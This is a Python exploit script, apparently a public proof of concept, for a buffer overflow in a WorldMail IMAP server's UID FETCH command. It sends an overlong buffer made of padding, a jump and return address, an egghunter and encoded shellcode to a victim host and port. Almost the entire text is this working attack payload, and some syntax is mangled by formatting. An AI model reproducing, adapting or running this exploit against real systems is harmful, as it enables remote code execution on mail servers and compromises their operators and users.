import sys,socket
banner =
print banner
if len (sys.argv)! = 3 :
banner()
print "\nUsage: ./worldmail_uid.py <IP> <PORT>\n"
sys.exit( 0 )
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
shellcode = "w00tw00t" + ( "\xb8\x3b\xe5\xd0\x36\xda\xd3\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x34\x07\x25\xca\xa2\x4e"
"\xc6\x33\x32\x31\x4e\xd6\x03\x63\x34\x92\x31\xb3\x3e\xf6\xb9"
"\x38\x12\xe3\x4a\x4c\xbb\x04\xfb\xfb\x9d\x2b\xfc\xcd\x21\xe7"
"\x3e\x4f\xde\xfa\x12\xaf\xdf\x34\x67\xae\x18\x28\x87\xe2\xf1"
"\x26\x35\x13\x75\x7a\x85\x12\x59\xf0\xb5\x6c\xdc\xc7\x41\xc7"
"\xdf\x17\xf9\x5c\x97\x8f\x72\x3a\x08\xb1\x57\x58\x74\xf8\xdc"
"\xab\x0e\xfb\x34\xe2\xef\xcd\x78\xa9\xd1\xe1\x75\xb3\x16\xc5"
"\x65\xc6\x6c\x35\x18\xd1\xb6\x47\xc6\x54\x2b\xef\x8d\xcf\x8f"
"\x11\x42\x89\x44\x1d\x2f\xdd\x03\x02\xae\x32\x38\x3e\x3b\xb5"
"\xef\xb6\x7f\x92\x2b\x92\x24\xbb\x6a\x7e\x8b\xc4\x6d\x26\x74"
"\x61\xe5\xc5\x61\x13\xa4\x81\x46\x2e\x57\x52\xc0\x39\x24\x60"
"\x4f\x92\xa2\xc8\x18\x3c\x34\x2e\x33\xf8\xaa\xd1\xbb\xf9\xe3"
"\x15\xef\xa9\x9b\xbc\x8f\x21\x5c\x40\x5a\xe5\x0c\xee\x34\x46"
"\xfd\x4e\xe4\x2e\x17\x41\xdb\x4f\x18\x8b\x6a\x48\xd6\xef\x3f"
"\x3f\x1b\x10\xae\xe3\x92\xf6\xba\x0b\xf3\xa1\x52\xee\x20\x7a"
"\xc5\x11\x03\xd6\x5e\x86\x1b\x30\x58\xa9\x9b\x16\xcb\x06\x33"
"\xf1\x9f\x44\x80\xe0\xa0\x40\xa0\x6b\x99\x03\x3a\x02\x68\xb5"
"\x3b\x0f\x1a\x56\xa9\xd4\xda\x11\xd2\x42\x8d\x76\x24\x9b\x5b"
"\x6b\x1f\x35\x79\x76\xf9\x7e\x39\xad\x3a\x80\xc0\x20\x06\xa6"
"\xd2\xfc\x87\xe2\x86\x50\xde\xbc\x70\x17\x88\x0e\x2a\xc1\x67"
"\xd9\xba\x94\x4b\xda\xbc\x98\x81\xac\x20\x28\x7c\xe9\x5f\x85"
"\xe8\xfd\x18\xfb\x88\x02\xf3\xbf\xb7\xf3\xc9\x55\x2f\xaa\xb8"
"\x17\x2d\x4d\x17\x5b\x48\xce\x9d\x24\xaf\xce\xd4\x21\xeb\x48"
"\x05\x58\x64\x3d\x29\xcf\x85\x14" )
buffer = "A" * 292
buffer + = shellcode
buffer + = "\x90" * 81
buffer + = "\xEB\x06\x90\x90"
buffer + = "\x95\xcb\x0d\x60"
buffer + = egghunter
buffer + = "}" * 32
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try :
s.connect((sys.argv[ 1 ], int (sys.argv[ 2 ])))
except :
print "Can\'t connect to server!\n"
sys.exit( 0 )
print "[+] Connecting to victim !"
data = s.recv( 1024 )
print "[+] " + data.rstrip()
print "[+] Sending evil buffer..."
s.send( 'A013 UID FETCH 4827313:4827313 ' + buffer + "\r\n" )
s.close()
print "[+] Exploitation Successful\n"
|